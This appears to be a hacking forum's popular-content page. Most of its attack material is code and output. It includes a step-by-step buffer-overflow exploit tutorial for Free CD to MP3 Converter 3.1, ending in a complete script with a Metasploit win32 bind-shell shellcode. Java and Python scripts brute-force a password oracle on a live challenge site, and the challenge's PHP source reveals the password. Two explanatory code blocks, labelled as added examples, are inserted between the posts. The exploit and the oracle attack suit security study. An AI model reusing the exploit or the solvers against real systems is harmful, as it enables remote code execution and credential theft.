Leaderboard

Popular Content

Showing content with the highest reputation on 07/21/11 in all areas

  1. The program:

     /*
      * To change this template, choose Tools | Templates
      * and open the template in the editor.
      */
     package rstchallenge;

     import java.io.BufferedReader;
     import java.io.IOException;
     import java.io.InputStreamReader;
     import java.net.MalformedURLException;
     import java.net.URL;
     import java.net.URLConnection;

     /**
      *
      * @author valentin
      */
     public class RstChallenge {

         // Sends 512 'a' characters as the pw cookie. The server wraps every
         // checked position in a <span>, so the first chunk after splitting on
         // </span> that starts with a raw 'a' marks the password length.
         public static int AflaLungimeaParolei(URL url) throws IOException {
             String string = "";
             for (int i = 0; i < 512; i++) string += 'a';
             string = "pw=" + string;
             URLConnection urlConn = url.openConnection();
             urlConn.setRequestProperty("Cookie", string);
             urlConn.connect();
             BufferedReader theHTML = new BufferedReader(new InputStreamReader(urlConn.getInputStream()));
             String st = theHTML.readLine();
             theHTML.close();
             String[] str = st.split("</span>");
             for (int i = 0; i < str.length; i++)
                 if (str[i].startsWith("a")) return i;
             return 0;
         }

         // Sends the same character x in every position; every position the
         // server renders green is correct for x and is stored in pass[].
         public static void incearcaPass(URL url, char x, char[] pass, int lungimeaParolei) throws IOException {
             String string = "";
             for (int i = 0; i < 512; i++) string += x;
             string = "pw=" + string;
             URLConnection urlConn = url.openConnection();
             urlConn.setRequestProperty("Cookie", string);
             urlConn.connect();
             BufferedReader theHTML = new BufferedReader(new InputStreamReader(urlConn.getInputStream()));
             String st = theHTML.readLine();
             theHTML.close();
             String[] str = st.split("</span>");
             for (int i = 0; i < lungimeaParolei; i++)
                 if (str[i].contains("green")) pass[i] = x;
         }

         /**
          * @param args the command line arguments
          */
         public static void main(String[] args) throws MalformedURLException, IOException {
             URL url = new URL("http://crs12decoder.comoj.com/findpw.php");
             int lungimeaParolei = AflaLungimeaParolei(url);
             System.out.println("Am aflat lungimea parolei: " + lungimeaParolei);
             char[] pass = new char[lungimeaParolei];
             for (char x = 'a'; x <= 'z'; x++) {
                 incearcaPass(url, x, pass, lungimeaParolei);
                 System.out.println("Acum incerc " + x);
             }
             //Show the pass
             System.out.println("Parola este:");
             for (int i = 0; i < lungimeaParolei; i++) System.out.print(pass[i]);
             System.out.println();
         }
     }

     The program's log:

     run:
     Am aflat lungimea parolei: 391
     Acum incerc a
     Acum incerc b
     Acum incerc c
     Acum incerc d
     Acum incerc e
     Acum incerc f
     Acum incerc g
     Acum incerc h
     Acum incerc i
     Acum incerc j
     Acum incerc k
     Acum incerc l
     Acum incerc m
     Acum incerc n
     Acum incerc o
     Acum incerc p
     Acum incerc q
     Acum incerc r
     Acum incerc s
     Acum incerc t
     Acum incerc u
     Acum incerc v
     Acum incerc w
     Acum incerc x
     Acum incerc y
     Acum incerc z
     Parola este:
     (intentionally hidden)
     BUILD SUCCESSFUL (total time: 45 seconds)

     P.S.: The long run time is because I'm on dial-up (128kbps). For the curious, here: java RstChallenge
    2 points
  2. We have started to tidy things up around here. One of the important things was to choose some more prominent members and promote them to the rank of V.I.P. We chose based on each one's posts and on the impression these members made on us. They are not necessarily members with 1000 posts; the number of posts is not important, but these people, at least for now, have shown us that they are more special and deserve something extra. Of course, we know these people more or less, we have talked with them and we know what they are capable of. These people are: - Andrei - Andrewboy - unu_1234567 - tex - tromfil - Synthesis - Birkoff - tdxev - Cheater - denjacker (daemien) Round 2, new VIP members: - 3348399 - Zatarra - ZeroCold Round 3: - Xander - wildchild We expect quality posts from the rest of you too, and sooner or later you may wake up, like them, to find that you are a VIP. Besides access to the "VIP Area", the private zone that only VIP members can access, they will also have our support, and that of the people who know what respect is, in whatever problems they may run into. Of course, the rank is also an honorary title.
    1 point
  3. [+]Written By D4rk357 [+]Special thanks to Peter Van Eeckhoutte for his awesome Exploit writing series. [+]Thanks to Fb1h2s for helping me out along the way [+]garage4hackers

     In this tutorial I will start from scratch and build a working exploit. A public exploit for this is already available here: Free CD to MP3 Converter 3.1 Buffer Overflow Exploit. First step is downloading and installing the vulnerable application from here: Application. Install Immunity Debugger or OllyDbg or WinDbg; any one of them would do. Now we will write a simple Python script which will generate a .wav file and test the application against it.

     # Generates crash.wav: 30000 'A' bytes (file opened in append mode)
     handle=open("crash.wav","a")
     Crap="\x41"*30000
     handle.write(Crap)
     handle.close()

     This little code upon execution will generate a file with the name crash.wav. Open the debugger of your choice, in my case Immunity Debugger. Open the executable of CD to MP3 Converter and then click on execute. Open: Execute: Now open your crash.wav file in CD to MP3 Converter, in the option wav to wav converter, and BOOM, the application dies instantly. Now check your debugger for what exactly happened. Woot woot, EIP has been overwritten. Not only EIP but a few more registers have been overwritten, thus increasing our chance to make a working exploit for this vulnerability. Now the next step is to determine the exact position at which EIP is overwritten. For that we will use a couple of tools which come with Metasploit. On the Windows platform open Cygwin and then browse to the tools directory of Metasploit. Once inside it, execute the pattern_create.rb script, which generates unique characters of whichever size you want. By reducing the size of Crap again and again in my script and getting a crash, I figured out that a string of 5000 unique characters will be more than enough. Syntax: ./pattern_create.rb 5000 Once the pattern is created, copy it and put it in place of Crap.

     Now execute the application from the debugger again and put in the newly generated crash.wav (delete the previous crash.wav file before doing it, as I am opening the file in append mode). Check the debugger again and you can see some numbers in EIP, which in my case is 31684630. Now in the Cygwin shell we will run pattern_offset to check where exactly EIP is being overwritten. Syntax: ./pattern_offset.rb 31684630 5000 And the location it gives me is 4112, great. So just to cross-check that the position of EIP given by the tool is correct, we will write a small script.

     # Cross-check: 4112 bytes of padding, then 4 'B' bytes that should land in EIP
     handle=open("crash.wav","a")
     Crap="\x41"*4112
     Eip="\x42"*4
     handle.write(Crap+Eip)
     handle.close()

     Again open the program through Immunity Debugger and execute it. After the application crashes, check EIP and you find there 42424242, which means the address found by the tool is perfect. Now we have to find the location of a command in a DLL file which calls/goes to ESP, like jmp esp etc. Now we will load the application again in the debugger and search for the jmp esp command in every DLL that is being loaded. (In Immunity Debugger we can take a look at the executable modules screen, double click on each DLL that is being loaded and then search for the specific command in that address space.) After some tinkering we will find that the DLL winmm.dll has a jmp esp command at 76B43ADC. Great, now we have almost everything we need to make a workable exploit. The address 76 B4 3A DC will be written as \xDC \x3A \xB4 \x76 since we are passing it as a string to EIP. We will use the win32 bind shell provided by Metasploit, encoded with the alpha2 encoder. We will add some NOPs (no operation bytes) before starting our shellcode because generally some bytes at the start are not interpreted by the processor as commands, so it could cause our exploit to fail. Adding NOPs increases the reliability of the exploit.

     And we get a telnet connection \m/ [P.S] You will have to write your own exploit (modify EIP) as I used a hard coded address. Don't try post mortem debugging; the debugger is not catching it (at least on my computer). P.S. here's the source code:

     handle=open("final.wav","a")
     Crap="\x41"*4112
     Eip="\xDC\x3A\xB4\x76"
     # win32_bind - EXITFUNC=seh LPORT=4444 Size=696 Encoder=Alpha2 http://metasploit.com
     ShellCode=("\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49"
     "\x49\x49\x49\x37\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x43"
     "\x58\x30\x41\x31\x50\x41\x42\x6b\x41\x41\x53\x32\x41\x42\x41\x32"
     "\x42\x41\x30\x42\x41\x58\x50\x38\x41\x42\x75\x4a\x49\x79\x6c\x62"
     "\x4a\x48\x6b\x70\x4d\x38\x68\x6c\x39\x4b\x4f\x79\x6f\x6b\x4f\x73"
     "\x50\x4c\x4b\x72\x4c\x46\x44\x57\x54\x4e\x6b\x31\x55\x67\x4c\x4e"
     "\x6b\x63\x4c\x34\x45\x62\x58\x46\x61\x48\x6f\x4e\x6b\x50\x4f\x44"
     "\x58\x6c\x4b\x51\x4f\x45\x70\x44\x41\x6a\x4b\x70\x49\x6e\x6b\x35"
     "\x64\x4c\x4b\x53\x31\x78\x6e\x75\x61\x6b\x70\x4f\x69\x6e\x4c\x4b"
     "\x34\x4f\x30\x53\x44\x57\x77\x6f\x31\x4b\x7a\x74\x4d\x75\x51\x69"
     "\x52\x68\x6b\x48\x74\x57\x4b\x70\x54\x64\x64\x47\x58\x50\x75\x6d"
     "\x35\x4c\x4b\x31\x4f\x36\x44\x56\x61\x78\x6b\x63\x56\x6c\x4b\x54"
     "\x4c\x70\x4b\x4e\x6b\x53\x6f\x75\x4c\x47\x71\x5a\x4b\x63\x33\x54"
     "\x6c\x4e\x6b\x6b\x39\x30\x6c\x44\x64\x35\x4c\x71\x71\x5a\x63\x34"
     "\x71\x6b\x6b\x72\x44\x6c\x4b\x37\x33\x76\x50\x4e\x6b\x71\x50\x56"
     "\x6c\x6c\x4b\x44\x30\x65\x4c\x4c\x6d\x4c\x4b\x77\x30\x35\x58\x61"
     "\x4e\x62\x48\x6c\x4e\x62\x6e\x44\x4e\x38\x6c\x50\x50\x4b\x4f\x5a"
     "\x76\x45\x36\x70\x53\x41\x76\x32\x48\x70\x33\x56\x52\x45\x38\x42"
     "\x57\x72\x53\x34\x72\x63\x6f\x72\x74\x6b\x4f\x78\x50\x72\x48\x38"
     "\x4b\x58\x6d\x6b\x4c\x65\x6b\x42\x70\x49\x6f\x69\x46\x71\x4f\x6c"
     "\x49\x6a\x45\x65\x36\x4f\x71\x4a\x4d\x35\x58\x53\x32\x50\x55\x32"
     "\x4a\x35\x52\x49\x6f\x48\x50\x31\x78\x7a\x79\x36\x69\x4c\x35\x6c"
     "\x6d\x70\x57\x39\x6f\x6e\x36\x70\x53\x32\x73\x62\x73\x56\x33\x52"
     "\x73\x73\x73\x52\x73\x33\x73\x30\x53\x6b\x4f\x4a\x70\x35\x36\x75"
     "\x38\x52\x31\x41\x4c\x61\x76\x50\x53\x4d\x59\x4d\x31\x4d\x45\x55"
     "\x38\x69\x34\x56\x7a\x42\x50\x5a\x67\x36\x37\x79\x6f\x7a\x76\x61"
     "\x7a\x76\x70\x66\x31\x73\x65\x39\x6f\x68\x50\x41\x78\x4d\x74\x4e"
     "\x4d\x76\x4e\x68\x69\x42\x77\x79\x6f\x59\x46\x36\x33\x66\x35\x69"
     "\x6f\x6e\x30\x45\x38\x4b\x55\x51\x59\x6f\x76\x72\x69\x42\x77\x6b"
     "\x4f\x4a\x76\x70\x50\x46\x34\x36\x34\x53\x65\x79\x6f\x6e\x30\x6c"
     "\x53\x65\x38\x4b\x57\x70\x79\x5a\x66\x52\x59\x30\x57\x69\x6f\x6a"
     "\x76\x30\x55\x59\x6f\x6e\x30\x70\x66\x70\x6a\x53\x54\x72\x46\x62"
     "\x48\x65\x33\x50\x6d\x6c\x49\x4d\x35\x31\x7a\x52\x70\x70\x59\x44"
     "\x69\x7a\x6c\x4c\x49\x69\x77\x51\x7a\x71\x54\x4f\x79\x4b\x52\x34"
     "\x71\x39\x50\x4c\x33\x4d\x7a\x6b\x4e\x71\x52\x44\x6d\x6b\x4e\x37"
     "\x32\x54\x6c\x4e\x73\x4e\x6d\x33\x4a\x56\x58\x6c\x6b\x6c\x6b\x6e"
     "\x4b\x53\x58\x64\x32\x69\x6e\x6c\x73\x44\x56\x6b\x4f\x73\x45\x47"
     "\x34\x4b\x4f\x79\x46\x33\x6b\x42\x77\x73\x62\x30\x51\x73\x61\x72"
     "\x71\x62\x4a\x33\x31\x42\x71\x50\x51\x72\x75\x50\x51\x49\x6f\x78"
     "\x50\x71\x78\x4e\x4d\x39\x49\x75\x55\x6a\x6e\x70\x53\x4b\x4f\x59"
     "\x46\x32\x4a\x4b\x4f\x49\x6f\x56\x57\x69\x6f\x5a\x70\x4e\x6b\x33"
     "\x67\x49\x6c\x6d\x53\x39\x54\x55\x34\x39\x6f\x4b\x66\x31\x42\x69"
     "\x6f\x4a\x70\x62\x48\x78\x70\x4d\x5a\x35\x54\x63\x6f\x70\x53\x39"
     "\x6f\x4e\x36\x39\x6f\x38\x50\x43")
     nops="\x90"*50
     handle.write(Crap+Eip+nops+ShellCode)
     handle.close()

     # Source: here.
    1 point
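     The tutorial above leans on Metasploit's pattern_create.rb / pattern_offset.rb without showing what they compute. The following is an added example, not part of the original post or of Metasploit: a small Python reimplementation of the cyclic pattern used in crash triage, with the value the tutorial reads out of EIP (31684630) decoded as a little-endian 32-bit word and located in a 5000-character pattern. The function names and the `max_len` default are this example's own choices.

     ```python
     import string
     import struct

     UPPER = string.ascii_uppercase
     LOWER = string.ascii_lowercase
     DIGITS = string.digits


     def pattern_create(length: int) -> str:
         """Build the Aa0Aa1...Az9Ba0... sequence that pattern_create.rb emits,
         truncated to `length` characters. Every 4-byte window is unique for the
         first 26*26*10*3 = 20280 characters, which is why a debugger register
         value can be mapped back to a single offset."""
         out = []
         for u in UPPER:
             for l in LOWER:
                 for d in DIGITS:
                     out.append(u + l + d)
                     if len(out) * 3 >= length:
                         return "".join(out)[:length]
         return "".join(out)[:length]


     def pattern_offset(value, length: int = 8192) -> int:
         """Return where `value` sits in a pattern of `length` characters, or -1.
         `value` is either the 32-bit number as the debugger prints it (x86 is
         little-endian, so 0x31684630 is the bytes "0Fh1" in memory) or the
         4-character string itself."""
         if isinstance(value, int):
             needle = struct.pack("<I", value).decode("ascii")
         else:
             needle = value
         return pattern_create(length).find(needle)


     if __name__ == "__main__":
         # The numbers from the tutorial: EIP = 31684630 after a 5000-byte pattern.
         print(pattern_create(5000)[:24])
         print("EIP 0x31684630 ->", pattern_offset(0x31684630, 5000))  # 4112
     ```

     The decoding step is the part people get wrong by hand: the debugger shows the register most-significant byte first, while the bytes that overwrote it were written in file order, so the word has to be reversed before searching. Any register value that maps to -1 was not taken from the pattern at all (the tutorial's all-0x41 file, for instance), which is itself useful triage information.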
  4. I used the length given by em, so I wouldn't have to extract it again.

     import urllib2
     import string
     import time

     target = "http://crs12decoder.comoj.com/findpw.php"
     ALPHA = 'abcdefghijklmnopqrstuvwxyz'
     currentpassword = ['a' for i in range(391)]
     for i in range(391):
         currentpassword[i] = 'a'

     def trypassword(letter):
         # Send the same letter in all 391 positions; every position the
         # server colours green is correct for this letter.
         global currentpassword, target
         temp = ''
         for i in range(391):
             temp += letter
         opener = urllib2.build_opener()
         opener.addheaders.append(('Cookie', 'pw=' + temp))
         try:
             f = opener.open(target)
         except:
             print 'Connection Timed Out'
             trypassword(letter)
             return  # the retry already handled this letter; f is undefined here
         lines = f.readline()
         chars = lines.split('</span>')
         for i in range(391):
             if 'green' in chars[i]:
                 currentpassword[i] = letter

     for letter in ALPHA:
         print 'Trying', letter
         trypassword(letter)

     password = ''
     for i in currentpassword:
         password += i
     print password
    1 point
  5. <?php
     if(!isset($_COOKIE["pw"])){
         setcookie("pw", "empty", time()+3600);
         header( "refresh:0;url=" );
     }
     $correct = array('n','e','v','e','r','g','e','t','l','o','s','t');
     $pw = $_COOKIE["pw"];
     if($pw == "empty"){
         echo 'crackme';
     }else{
         $exp = str_split($pw);
         for($i=0; $i<=11; $i++){
             if(isset($exp[$i])){
                 if($exp[$i] == $correct[$i]){
                     $exp[$i] = '<span style="color:green">'.$correct[$i].'</span>';
                 }else{
                     $exp[$i] = '<span style="color:red">'.$exp[$i].'</span>';
                 }
             }
         }
         for($i=0; $i<count($exp); $i++){
             echo $exp[$i];
         }
         if(isset($_COOKIE["pw"])){
             if($pw=='nevergetlost'){
                 echo '<br><br><span style="color:green">OK</span>';
             }else{
                 echo '<br><br><span style="color:red">Wrong!</span>';
             }
         }
     }
     ?>
    1 point
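     The three posts above (the Java solution in item 1, the Python solution in item 4 and the PHP source in item 5) all turn on one defect: the page answers with a green or red span per character, so the server itself is a per-position oracle and the whole secret falls in one request per letter of the alphabet, whatever its length. The following is an added example, not code from any of the posts or from the challenge: a Python simulation of the challenge's checker next to a hardened version that returns a single verdict computed with a constant-time comparison, with the same per-position strategy run against both so the difference is visible. The secret value, the function names and the `max_len` default are this example's own constructions.

     ```python
     import hmac
     import re
     import string

     # Constructed secret for the simulation; nothing here assumes the challenge's real value.
     SECRET = "nevergetlost"
     ALPHABET = string.ascii_lowercase


     def leaky_check(pw: str, secret: str = SECRET) -> str:
         """Mirror the challenge's PHP: one <span> per checked position, green when
         that character matches and red otherwise. Characters past the secret's
         length are echoed raw, which is what lets a long probe reveal the length."""
         out = []
         for i, ch in enumerate(pw):
             if i < len(secret):
                 colour = "green" if ch == secret[i] else "red"
                 out.append('<span style="color:%s">%s</span>' % (colour, ch))
             else:
                 out.append(ch)
         if pw == secret:
             out.append('<br><br><span style="color:green">OK</span>')
         else:
             out.append('<br><br><span style="color:red">Wrong!</span>')
         return "".join(out)


     def hardened_check(pw: str, secret: str = SECRET) -> str:
         """Same decision, but the response carries a single bit and the comparison
         runs in constant time, so neither per-position results nor timing leak."""
         return "OK" if hmac.compare_digest(pw.encode(), secret.encode()) else "Wrong!"


     def recover_from_oracle(oracle, max_len: int = 512):
         """The per-position strategy the two solutions above use, written against
         a callable so it can be pointed at either checker. Returns the recovered
         text ('?' where nothing was learned) and the number of requests made."""
         probes = 1
         body = oracle("a" * max_len).split("<br><br>")[0]
         n = body.count("</span>")          # one span per checked position
         found = ["?"] * n
         for letter in ALPHABET:
             if n == 0:                     # no per-position feedback: nothing to learn
                 break
             probes += 1
             body = oracle(letter * n).split("<br><br>")[0]
             colours = re.findall(r'color:(green|red)', body)
             for i, colour in enumerate(colours):
                 if colour == "green":
                     found[i] = letter
         return "".join(found), probes


     if __name__ == "__main__":
         print("leaky    ->", recover_from_oracle(leaky_check))      # ('nevergetlost', 27)
         print("hardened ->", recover_from_oracle(hardened_check))   # ('', 1)
     ```

     Against the leaky checker the recovery takes 1 + 26 requests regardless of the secret's length, which matches the 26 "Acum incerc" lines in the Java log above. Against the hardened checker the length probe returns no spans, so the loop has nothing to iterate and the only information available is the one-bit verdict; bytes are passed to `hmac.compare_digest` so that strings of unequal length, or non-ASCII input, never short-circuit the comparison.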
  6. Johnny Maker - Summer is love (Molto Haus Mix)
    1 point
  7. Not a file manager, you struggle with downloading.
    -1 points
  8. Did you know that when you browse the net your traffic can be intercepted? In this tutorial I will present a pretty good method of hiding your IP. All you need is "putty" (you can find it on Google) and an HTTPS proxy on port 443 (secure connection). After you have downloaded putty the settings are simple... Type the IP and the port in the Session window. Give the connection a name in the Windows/Behavior window. Connection/Data - type the user and password. Here leave NONE. Here the 2 options must be checked: Don't start a shell or command at all - if you don't check it the connection to the server cannot be established, because the server is not set up to accept shell commands and will drop the connection, so it has to be checked. Here the first 2 options must be checked; at Source port put port 1080, at Destination select the Dynamic option, then click on add. Save the settings you created in the Session window, where you put the server's IP and port; at save session put any name, then click on save. Then click on OPEN and it will look like this: That was all! You can download Proxifier, which will take over all the traffic from browsers, programs, etc. I removed the server from the pictures because it is a private server (it's mine); it doesn't keep logs at all.
    -1 points
  9. <?php
     // put the clip codes into the array
     $clipuri = array(
         0 => "wK2U0dYZeQI",
         1 => "YFK6H_CcuX8",
         2 => "ctLnNQOVg0E"
     );
     // pick a code from the array at random
     $rand = $clipuri[rand(0,2)];
     // display the clip
     echo '<iframe width="425" height="349" src="http://www.youtube.com/embed/' . $rand . '" frameborder="0" allowfullscreen></iframe>';
     ?>

     Live demo: http://infosource.cz.cc/clipuri.php
    -1 points
  10. You put the clips in this part:

     // put the clip codes into the array
     $clipuri = array(
         0 => "wK2U0dYZeQI",
         1 => "YFK6H_CcuX8",
         2 => "ctLnNQOVg0E"
     );

     What you see here is what comes after v= in a link like http://www.youtube.com/watch?v=PoTEnaAI9Fo, for example. You just keep adding, for example:

     // put the clip codes into the array
     $clipuri = array(
         0 => "wK2U0dYZeQI",
         1 => "YFK6H_CcuX8",
         2 => "ctLnNQOVg0E",
         3 => "PoTEnaAI9Fo"
     );

     Below, you change

     // pick a code from the array at random
     $rand = $clipuri[rand(0,3)];

     Basically, this line says to take a random clip, from 0 to 3. If you have... 1000 videos, you put (0,1000). If you only want... 100 of them, and those are from.. 100 to 199, you put (100,199). That's about it. PS: Well done, Synthesis.
    -1 points
  11. Even if you install VBOX from ports, the process is a bit more complicated than usual...

     Step 1. Installing from ports
     -----------------------------------------------
     cd /usr/ports/emulators/virtualbox
     make install clean

     Step 2. A few touch-ups
     -------------------------------------------------------------
     Without these configs the application won't work...

     We mount proc:
     mount -t procfs proc /proc

     We load the vbox kernel modules:
     kldload vboxdrv
     kldload vboxnetflt

     We add the user to the vboxusers group:
     pw groupmod vboxusers -m <user>

     We push the suppository in deeper so it doesn't come out at boot (add these to /boot/loader.conf):
     vboxdrv_load="YES"
     vboxnetflt_load="YES"

     and we do the same with proc in /etc/fstab:
     proc /proc procfs rw 0 0

     Step 3. You trip and fracture your spine
     ----------------------
     Start vbox from the console and it should work (better than you after you've been paralysed...):
     virtualBox

     Note:
     --------
     if you're on 64 bits, you give the kernel this:
     option COMPAT_IA32

     Cheers and thanks a lot!
    -1 points